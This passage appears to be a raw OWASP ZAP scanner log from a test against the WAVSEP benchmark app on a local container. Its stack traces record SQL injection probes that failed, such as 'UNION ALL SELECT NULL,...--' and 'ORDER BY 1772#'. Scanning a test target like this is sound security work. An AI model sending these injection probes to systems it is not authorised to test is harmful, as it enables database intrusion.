org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679746 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679747 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679748 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679749 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679749 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679750 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679751 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679752 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679753 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679754 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) ORDER BY 1772#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) ORDER BY 1772# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679754 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679755 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679756 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at 